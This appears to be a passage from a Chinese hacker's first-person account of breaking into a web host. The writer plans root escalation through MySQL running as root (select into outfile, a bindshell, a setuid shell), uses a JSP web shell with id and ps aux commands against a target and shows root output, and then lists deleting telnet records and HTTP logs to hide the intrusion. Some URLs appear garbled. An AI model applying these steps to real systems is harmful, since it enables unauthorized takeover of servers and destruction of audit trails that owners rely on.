grep+mysqld
显示:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72
/usr/local/data/mysql
嘿嘿,有办法了,系统是以root身份运行的mysql,同时我知道了mysql的密码,那我现在我可以写一个shell程序,让它create一个表,然后将我的数据放到表中,然后再使用"select ...into outfile;"的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。
还记得apache.org有一次被入侵吗?hacker就采用的这种办法)。 然后,我再上传bindshell之类的程序,运行、获得nobody的权限,然后......再使用suroot时帮忙创建的setuid shell让自己成为root. 嘿嘿,真是好办法,我都为我的想法感到得意......
接下去的事情,差点没让我吐血:
我敲了一个:http://target:8080http://img.zhengzen.com/upload/shadu_5/cmd.jsp?cmd=id
显示:
uid=0(root) gid=0(xxx)
groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
kao,我的这个WEB SHELL本来就是ROOT,真是服了那个管理员,也服了自己。竟然折腾了这么
半天,哎!
http://target:8080http://img.zhengzen.com/upload/shadu_5/cmd.jsp?cmd=ps+aux 果然是root身份运行的(不列出来了)
剩下来的事情:
1、删除我的telnet记录。
2、删除http的日志。
至于清除日志嘛,我使用的办法是:cat xxx
关键词:入侵WEB主机的全过程